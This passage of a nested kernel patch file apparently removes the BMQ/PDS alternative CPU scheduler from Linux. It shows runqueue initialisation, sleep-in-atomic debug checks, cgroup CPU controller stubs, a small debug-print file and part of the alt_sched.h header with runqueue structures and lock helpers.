-+		rq->prio = IDLE_TASK_SCHED_PRIO;
-+		rq->skip = NULL;
-+
-+		raw_spin_lock_init(&rq->lock);
-+		rq->nr_running = rq->nr_uninterruptible = 0;
-+		rq->calc_load_active = 0;
-+		rq->calc_load_update = jiffies + LOAD_FREQ;
-+#ifdef CONFIG_SMP
-+		rq->online = false;
-+		rq->cpu = i;
-+
-+#ifdef CONFIG_SCHED_SMT
-+		rq->active_balance = 0;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
-+#endif
-+		rq->balance_callback = &balance_push_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+		rcuwait_init(&rq->hotplug_wait);
-+#endif
-+#endif /* CONFIG_SMP */
-+		rq->nr_switches = 0;
-+
-+		hrtick_rq_init(rq);
-+		atomic_set(&rq->nr_iowait, 0);
-+	}
-+#ifdef CONFIG_SMP
-+	/* Set rq->online for cpu 0 */
-+	cpu_rq(0)->online = true;
-+#endif
-+	/*
-+	 * The boot idle thread does lazy MMU switching as well:
-+	 */
-+	mmgrab(&init_mm);
-+	enter_lazy_tlb(&init_mm, current);
-+
-+	/*
-+	 * The idle task doesn't need the kthread struct to function, but it
-+	 * is dressed up as a per-CPU kthread and thus needs to play the part
-+	 * if we want to avoid special-casing it in code that deals with per-CPU
-+	 * kthreads.
-+	 */
-+	WARN_ON(!set_kthread_struct(current));
-+
-+	/*
-+	 * Make us the idle thread. Technically, schedule() should not be
-+	 * called from this thread, however somewhere below it might be,
-+	 * but because we are the idle thread, we just pick up running again
-+	 * when this runqueue becomes "idle".
-+	 */
-+	init_idle(current, smp_processor_id());
-+
-+	calc_load_update = jiffies + LOAD_FREQ;
-+
-+#ifdef CONFIG_SMP
-+	idle_thread_set_boot_cpu();
-+	balance_push_set(smp_processor_id(), false);
-+
-+	sched_init_topology_cpumask_early();
-+#endif /* SMP */
-+
-+	psi_init();
-+
-+	preempt_dynamic_init();
-+}
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+
-+void __might_sleep(const char *file, int line)
-+{
-+	unsigned int state = get_current_state();
-+	/*
-+	 * Blocking primitives will set (and therefore destroy) current->state,
-+	 * since we will exit with TASK_RUNNING make sure we enter with it,
-+	 * otherwise we will destroy state.
-+	 */
-+	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
-+			"do not call blocking ops when !TASK_RUNNING; "
-+			"state=%x set at [<%p>] %pS\n", state,
-+			(void *)current->task_state_change,
-+			(void *)current->task_state_change);
-+
-+	__might_resched(file, line, 0);
-+}
-+EXPORT_SYMBOL(__might_sleep);
-+
-+static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
-+{
-+	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
-+		return;
-+
-+	if (preempt_count() == preempt_offset)
-+		return;
-+
-+	pr_err("Preemption disabled at:");
-+	print_ip_sym(KERN_ERR, ip);
-+}
-+
-+static inline bool resched_offsets_ok(unsigned int offsets)
-+{
-+	unsigned int nested = preempt_count();
-+
-+	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
-+
-+	return nested == offsets;
-+}
-+
-+void __might_resched(const char *file, int line, unsigned int offsets)
-+{
-+	/* Ratelimiting timestamp: */
-+	static unsigned long prev_jiffy;
-+
-+	unsigned long preempt_disable_ip;
-+
-+	/* WARN_ON_ONCE() by default, no rate limit required: */
-+	rcu_sleep_check();
-+
-+	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
-+	     !is_idle_task(current) && !current->non_block_count) ||
-+	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
-+	    oops_in_progress)
-+		return;
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	/* Save this before calling printk(), since that will clobber it: */
-+	preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
-+	       file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), current->non_block_count,
-+	       current->pid, current->comm);
-+	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
-+	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
-+
-+	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
-+		pr_err("RCU nest depth: %d, expected: %u\n",
-+		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
-+	}
-+
-+	if (task_stack_end_corrupted(current))
-+		pr_emerg("Thread overran stack, or stack corrupted\n");
-+
-+	debug_show_held_locks(current);
-+	if (irqs_disabled())
-+		print_irqtrace_events(current);
-+
-+	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
-+				 preempt_disable_ip);
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL(__might_resched);
-+
-+void __cant_sleep(const char *file, int line, int preempt_offset)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > preempt_offset)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
-+	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
-+			in_atomic(), irqs_disabled(),
-+			current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_sleep);
-+
-+#ifdef CONFIG_SMP
-+void __cant_migrate(const char *file, int line)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (is_migration_disabled(current))
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > 0)
-+		return;
-+
-+	if (current->migration_flags & MDF_FORCE_ENABLED)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
-+	       current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_migrate);
-+#endif
-+#endif
-+
-+#ifdef CONFIG_MAGIC_SYSRQ
-+void normalize_rt_tasks(void)
-+{
-+	struct task_struct *g, *p;
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+	};
-+
-+	read_lock(&tasklist_lock);
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Only normalize user tasks:
-+		 */
-+		if (p->flags & PF_KTHREAD)
-+			continue;
-+
-+		schedstat_set(p->stats.wait_start,  0);
-+		schedstat_set(p->stats.sleep_start, 0);
-+		schedstat_set(p->stats.block_start, 0);
-+
-+		if (!rt_task(p)) {
-+			/*
-+			 * Renice negative nice level userspace
-+			 * tasks back to 0:
-+			 */
-+			if (task_nice(p) < 0)
-+				set_user_nice(p, 0);
-+			continue;
-+		}
-+
-+		__sched_setscheduler(p, &attr, false, false);
-+	}
-+	read_unlock(&tasklist_lock);
-+}
-+#endif /* CONFIG_MAGIC_SYSRQ */
-+
-+#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
-+/*
-+ * These functions are only useful for the IA64 MCA handling, or kdb.
-+ *
-+ * They can only be called when the whole system has been
-+ * stopped - every CPU needs to be quiescent, and no scheduling
-+ * activity can take place. Using them for anything else would
-+ * be a serious bug, and as a result, they aren't even visible
-+ * under any other configuration.
-+ */
-+
-+/**
-+ * curr_task - return the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ *
-+ * Return: The current task for @cpu.
-+ */
-+struct task_struct *curr_task(int cpu)
-+{
-+	return cpu_curr(cpu);
-+}
-+
-+#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
-+
-+#ifdef CONFIG_IA64
-+/**
-+ * ia64_set_curr_task - set the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ * @p: the task pointer to set.
-+ *
-+ * Description: This function must only be used when non-maskable interrupts
-+ * are serviced on a separate stack.  It allows the architecture to switch the
-+ * notion of the current task on a CPU in a non-blocking manner.  This function
-+ * must be called with all CPU's synchronised, and interrupts disabled, the
-+ * and caller must save the original value of the current task (see
-+ * curr_task() above) and restore that value before reenabling interrupts and
-+ * re-starting the system.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ */
-+void ia64_set_curr_task(int cpu, struct task_struct *p)
-+{
-+	cpu_curr(cpu) = p;
-+}
-+
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+static void sched_free_group(struct task_group *tg)
-+{
-+	kmem_cache_free(task_group_cache, tg);
-+}
-+
-+static void sched_free_group_rcu(struct rcu_head *rhp)
-+{
-+	sched_free_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+static void sched_unregister_group(struct task_group *tg)
-+{
-+	/*
-+	 * We have to wait for yet another RCU grace period to expire, as
-+	 * print_cfs_stats() might run concurrently.
-+	 */
-+	call_rcu(&tg->rcu, sched_free_group_rcu);
-+}
-+
-+/* allocate runqueue etc for a new task group */
-+struct task_group *sched_create_group(struct task_group *parent)
-+{
-+	struct task_group *tg;
-+
-+	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
-+	if (!tg)
-+		return ERR_PTR(-ENOMEM);
-+
-+	return tg;
-+}
-+
-+void sched_online_group(struct task_group *tg, struct task_group *parent)
-+{
-+}
-+
-+/* rcu callback to free various structures associated with a task group */
-+static void sched_unregister_group_rcu(struct rcu_head *rhp)
-+{
-+	/* Now it should be safe to free those cfs_rqs: */
-+	sched_unregister_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+void sched_destroy_group(struct task_group *tg)
-+{
-+	/* Wait for possible concurrent references to cfs_rqs complete: */
-+	call_rcu(&tg->rcu, sched_unregister_group_rcu);
-+}
-+
-+void sched_release_group(struct task_group *tg)
-+{
-+}
-+
-+static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
-+{
-+	return css ? container_of(css, struct task_group, css) : NULL;
-+}
-+
-+static struct cgroup_subsys_state *
-+cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
-+{
-+	struct task_group *parent = css_tg(parent_css);
-+	struct task_group *tg;
-+
-+	if (!parent) {
-+		/* This is early initialization for the top cgroup */
-+		return &root_task_group.css;
-+	}
-+
-+	tg = sched_create_group(parent);
-+	if (IS_ERR(tg))
-+		return ERR_PTR(-ENOMEM);
-+	return &tg->css;
-+}
-+
-+/* Expose task group only after completing cgroup initialization */
-+static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+	struct task_group *parent = css_tg(css->parent);
-+
-+	if (parent)
-+		sched_online_group(tg, parent);
-+	return 0;
-+}
-+
-+static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	sched_release_group(tg);
-+}
-+
-+static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	/*
-+	 * Relies on the RCU grace period between css_released() and this.
-+	 */
-+	sched_unregister_group(tg);
-+}
-+
-+#ifdef CONFIG_RT_GROUP_SCHED
-+static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static void cpu_cgroup_attach(struct cgroup_taskset *tset)
-+{
-+}
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+static DEFINE_MUTEX(shares_mutex);
-+
-+int sched_group_set_shares(struct task_group *tg, unsigned long shares)
-+{
-+	/*
-+	 * We can't change the weight of the root cgroup.
-+	 */
-+	if (&root_task_group == tg)
-+		return -EINVAL;
-+
-+	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
-+
-+	mutex_lock(&shares_mutex);
-+	if (tg->shares == shares)
-+		goto done;
-+
-+	tg->shares = shares;
-+done:
-+	mutex_unlock(&shares_mutex);
-+	return 0;
-+}
-+
-+static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
-+				struct cftype *cftype, u64 shareval)
-+{
-+	if (shareval > scale_load_down(ULONG_MAX))
-+		shareval = MAX_SHARES;
-+	return sched_group_set_shares(css_tg(css), scale_load(shareval));
-+}
-+
-+static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
-+			       struct cftype *cft)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	return (u64) scale_load_down(tg->shares);
-+}
-+#endif
-+
-+static struct cftype cpu_legacy_files[] = {
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	{
-+		.name = "shares",
-+		.read_u64 = cpu_shares_read_u64,
-+		.write_u64 = cpu_shares_write_u64,
-+	},
-+#endif
-+	{ }	/* Terminate */
-+};
-+
-+
-+static struct cftype cpu_files[] = {
-+	{ }	/* terminate */
-+};
-+
-+static int cpu_extra_stat_show(struct seq_file *sf,
-+			       struct cgroup_subsys_state *css)
-+{
-+	return 0;
-+}
-+
-+struct cgroup_subsys cpu_cgrp_subsys = {
-+	.css_alloc	= cpu_cgroup_css_alloc,
-+	.css_online	= cpu_cgroup_css_online,
-+	.css_released	= cpu_cgroup_css_released,
-+	.css_free	= cpu_cgroup_css_free,
-+	.css_extra_stat_show = cpu_extra_stat_show,
-+#ifdef CONFIG_RT_GROUP_SCHED
-+	.can_attach	= cpu_cgroup_can_attach,
-+#endif
-+	.attach		= cpu_cgroup_attach,
-+	.legacy_cftypes	= cpu_files,
-+	.legacy_cftypes	= cpu_legacy_files,
-+	.dfl_cftypes	= cpu_files,
-+	.early_init	= true,
-+	.threaded	= true,
-+};
-+#endif	/* CONFIG_CGROUP_SCHED */
-+
-+#undef CREATE_TRACE_POINTS
-diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
-new file mode 100644
-index 000000000000..1212a031700e
---- /dev/null
-+++ b/kernel/sched/alt_debug.c
-@@ -0,0 +1,31 @@
-+/*
-+ * kernel/sched/alt_debug.c
-+ *
-+ * Print the alt scheduler debugging details
-+ *
-+ * Author: Alfred Chen
-+ * Date  : 2020
-+ */
-+#include "sched.h"
-+
-+/*
-+ * This allows printing both to /proc/sched_debug and
-+ * to the console
-+ */
-+#define SEQ_printf(m, x...)			\
-+ do {						\
-+	if (m)					\
-+		seq_printf(m, x);		\
-+	else					\
-+		pr_cont(x);			\
-+ } while (0)
-+
-+void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
-+			  struct seq_file *m)
-+{
-+	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
-+						get_nr_threads(p));
-+}
-+
-+void proc_sched_set_task(struct task_struct *p)
-+{}
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-new file mode 100644
-index 000000000000..c32403ed82b6
---- /dev/null
-+++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,668 @@
-+#ifndef ALT_SCHED_H
-+#define ALT_SCHED_H
-+
-+#include <linux/context_tracking.h>
-+#include <linux/profile.h>
-+#include <linux/psi.h>
-+#include <linux/stop_machine.h>
-+#include <linux/syscalls.h>
-+#include <linux/tick.h>
-+
-+#include <trace/events/power.h>
-+#include <trace/events/sched.h>
-+
-+#include "../workqueue_internal.h"
-+
-+#include "cpupri.h"
-+
-+#ifdef CONFIG_SCHED_BMQ
-+/* bits:
-+ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
-+#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
-+#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
-+#endif /* CONFIG_SCHED_PDS */
-+
-+#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
-+extern void resched_latency_warn(int cpu, u64 latency);
-+#else
-+# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
-+static inline void resched_latency_warn(int cpu, u64 latency) {}
-+#endif
-+
-+/*
-+ * Increase resolution of nice-level calculations for 64-bit architectures.
-+ * The extra resolution improves shares distribution and load balancing of
-+ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
-+ * hierarchies, especially on larger systems. This is not a user-visible change
-+ * and does not change the user-interface for setting shares/weights.
-+ *
-+ * We increase resolution only if we have enough bits to allow this increased
-+ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
-+ * are pretty high and the returns do not justify the increased costs.
-+ *
-+ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
-+ * increase coverage and consistency always enable it on 64-bit platforms.
-+ */
-+#ifdef CONFIG_64BIT
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load_down(w) \
-+({ \
-+	unsigned long __w = (w); \
-+	if (__w) \
-+		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
-+	__w; \
-+})
-+#else
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		(w)
-+# define scale_load_down(w)	(w)
-+#endif
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
-+
-+/*
-+ * A weight of 0 or 1 can cause arithmetics problems.
-+ * A weight of a cfs_rq is the sum of weights of which entities
-+ * are queued on this cfs_rq, so a weight of a entity should not be
-+ * too large, so as the shares value of a task group.
-+ * (The default weight is 1024 - so there's no practical
-+ *  limitation from this.)
-+ */
-+#define MIN_SHARES		(1UL <<  1)
-+#define MAX_SHARES		(1UL << 18)
-+#endif
-+
-+/*
-+ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
-+ */
-+#ifdef CONFIG_SCHED_DEBUG
-+# define const_debug __read_mostly
-+#else
-+# define const_debug const
-+#endif
-+
-+/* task_struct::on_rq states: */
-+#define TASK_ON_RQ_QUEUED	1
-+#define TASK_ON_RQ_MIGRATING	2
-+
-+static inline int task_on_rq_queued(struct task_struct *p)
-+{
-+	return p->on_rq == TASK_ON_RQ_QUEUED;
-+}
-+
-+static inline int task_on_rq_migrating(struct task_struct *p)
-+{
-+	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
-+}
-+
-+/*
-+ * wake flags
-+ */
-+#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
-+#define WF_FORK		0x02		/* child wakeup after fork */
-+#define WF_MIGRATED	0x04		/* internal use, task got migrated */
-+
-+#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
-+
-+struct sched_queue {
-+	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
-+	struct list_head heads[SCHED_BITS];
-+};
-+
-+struct rq;
-+struct balance_callback {
-+	struct balance_callback *next;
-+	void (*func)(struct rq *rq);
-+};
-+
-+/*
-+ * This is the main, per-CPU runqueue data structure.
-+ * This data should only be modified by the local cpu.
-+ */
-+struct rq {
-+	/* runqueue lock: */
-+	raw_spinlock_t lock;
-+
-+	struct task_struct __rcu *curr;
-+	struct task_struct *idle, *stop, *skip;
-+	struct mm_struct *prev_mm;
-+
-+	struct sched_queue	queue;
-+#ifdef CONFIG_SCHED_PDS
-+	u64			time_edge;
-+#endif
-+	unsigned long prio;
-+
-+	/* switch count */
-+	u64 nr_switches;
-+
-+	atomic_t nr_iowait;
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	u64 last_seen_need_resched_ns;
-+	int ticks_without_resched;
-+#endif
-+
-+#ifdef CONFIG_MEMBARRIER
-+	int membarrier_state;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+	int cpu;		/* cpu of this runqueue */
-+	bool online;
-+
-+	unsigned int		ttwu_pending;
-+	unsigned char		nohz_idle_balance;
-+	unsigned char		idle_balance;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	struct sched_avg	avg_irq;
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+	int active_balance;
-+	struct cpu_stop_work	active_balance_work;
-+#endif
-+	struct balance_callback	*balance_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+	struct rcuwait		hotplug_wait;
-+#endif
-+	unsigned int		nr_pinned;
-+
-+#endif /* CONFIG_SMP */
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	u64 prev_irq_time;
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+#ifdef CONFIG_PARAVIRT
-+	u64 prev_steal_time;
-+#endif /* CONFIG_PARAVIRT */
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	u64 prev_steal_time_rq;
-+#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
-+
-+	/* For genenal cpu load util */
-+	s32 load_history;
-+	u64 load_block;
-+	u64 load_stamp;
-+
-+	/* calc_load related fields */
-+	unsigned long calc_load_update;
-+	long calc_load_active;
-+
-+	u64 clock, last_tick;
-+	u64 last_ts_switch;
-+	u64 clock_task;
-+
-+	unsigned int  nr_running;
-+	unsigned long nr_uninterruptible;
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+#ifdef CONFIG_SMP
-+	call_single_data_t hrtick_csd;
-+#endif
-+	struct hrtimer		hrtick_timer;
-+	ktime_t			hrtick_time;
-+#endif
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+	/* latency stats */
-+	struct sched_info rq_sched_info;
-+	unsigned long long rq_cpu_time;
-+	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
-+
-+	/* sys_sched_yield() stats */
-+	unsigned int yld_count;
-+
-+	/* schedule() stats */
-+	unsigned int sched_switch;
-+	unsigned int sched_count;
-+	unsigned int sched_goidle;
-+
-+	/* try_to_wake_up() stats */
-+	unsigned int ttwu_count;
-+	unsigned int ttwu_local;
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+#ifdef CONFIG_CPU_IDLE
-+	/* Must be inspected within a rcu lock section */
-+	struct cpuidle_state *idle_state;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#ifdef CONFIG_SMP
-+	call_single_data_t	nohz_csd;
-+#endif
-+	atomic_t		nohz_flags;
-+#endif /* CONFIG_NO_HZ_COMMON */
-+};
-+
-+extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
-+
-+extern unsigned long calc_load_update;
-+extern atomic_long_t calc_load_tasks;
-+
-+extern void calc_global_load_tick(struct rq *this_rq);
-+extern long calc_load_fold_active(struct rq *this_rq, long adjust);
-+
-+DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
-+#define this_rq()		this_cpu_ptr(&runqueues)
-+#define task_rq(p)		cpu_rq(task_cpu(p))
-+#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
-+#define raw_rq()		raw_cpu_ptr(&runqueues)
-+
-+#ifdef CONFIG_SMP
-+#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
-+void register_sched_domain_sysctl(void);
-+void unregister_sched_domain_sysctl(void);
-+#else
-+static inline void register_sched_domain_sysctl(void)
-+{
-+}
-+static inline void unregister_sched_domain_sysctl(void)
-+{
-+}
-+#endif
-+
-+extern bool sched_smp_initialized;
-+
-+enum {
-+	ITSELF_LEVEL_SPACE_HOLDER,
-+#ifdef CONFIG_SCHED_SMT
-+	SMT_LEVEL_SPACE_HOLDER,
-+#endif
-+	COREGROUP_LEVEL_SPACE_HOLDER,
-+	CORE_LEVEL_SPACE_HOLDER,
-+	OTHER_LEVEL_SPACE_HOLDER,
-+	NR_CPU_AFFINITY_LEVELS
-+};
-+
-+DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+
-+static inline int
-+__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
-+{
-+	int cpu;
-+
-+	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
-+		mask++;
-+
-+	return cpu;
-+}
-+
-+static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
-+{
-+	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
-+}
-+
-+extern void flush_smp_call_function_queue(void);
-+
-+#else  /* !CONFIG_SMP */
-+static inline void flush_smp_call_function_queue(void) { }
-+#endif
-+
-+#ifndef arch_scale_freq_tick
-+static __always_inline
-+void arch_scale_freq_tick(void)
-+{
-+}
-+#endif
-+
-+#ifndef arch_scale_freq_capacity
-+static __always_inline
-+unsigned long arch_scale_freq_capacity(int cpu)
-+{
-+	return SCHED_CAPACITY_SCALE;
-+}
-+#endif
-+
-+static inline u64 __rq_clock_broken(struct rq *rq)
-+{
-+	return READ_ONCE(rq->clock);
-+}
-+
-+static inline u64 rq_clock(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ, call to
-+	 * sched_info_xxxx() may not held rq->lock
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock;
-+}
-+
-+static inline u64 rq_clock_task(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ, call to
-+	 * sched_info_xxxx() may not held rq->lock
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock_task;
-+}
-+
-+/*
-+ * {de,en}queue flags:
-+ *
-+ * DEQUEUE_SLEEP  - task is no longer runnable
-+ * ENQUEUE_WAKEUP - task just became runnable
-+ *
-+ */
-+
-+#define DEQUEUE_SLEEP		0x01
-+
-+#define ENQUEUE_WAKEUP		0x01
-+
-+
-+/*
-+ * Below are scheduler API which using in other kernel code
-+ * It use the dummy rq_flags
-+ * ToDo : BMQ need to support these APIs for compatibility with mainline
-+ * scheduler code.
-+ */
-+struct rq_flags {
-+	unsigned long flags;
-+};
-+
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock);
-+
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock);
-+
-+static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
-+	__releases(rq->lock)
-+	__releases(p->pi_lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+}
-+
-+static inline void
-+rq_lock(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+static inline struct rq *
-+this_rq_lock_irq(struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	local_irq_disable();
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	return rq;
-+}
-+
-+static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
-+{
-+	return &rq->lock;
-+}
-+
-+static inline raw_spinlock_t *rq_lockp(struct rq *rq)
-+{
-+	return __rq_lockp(rq);
-+}
-+
-+static inline void lockdep_assert_rq_held(struct rq *rq)
-+{
-+	lockdep_assert_held(__rq_lockp(rq));
-+}
-+
-+extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
-+extern void raw_spin_rq_unlock(struct rq *rq);
-+
-+static inline void raw_spin_rq_lock(struct rq *rq)
-+{
-+	raw_spin_rq_lock_nested(rq, 0);
-+}
-+
-+static inline void raw_spin_rq_lock_irq(struct rq *rq)
-+{
-+	local_irq_disable();
-+	raw_spin_rq_lock(rq);
-+}
-+
-+static inline void raw_spin_rq_unlock_irq(struct rq *rq)
-+{
-+	raw_spin_rq_unlock(rq);
-+	local_irq_enable();
-+}
-+
-+static inline int task_current(struct rq *rq, struct task_struct *p)
-+{
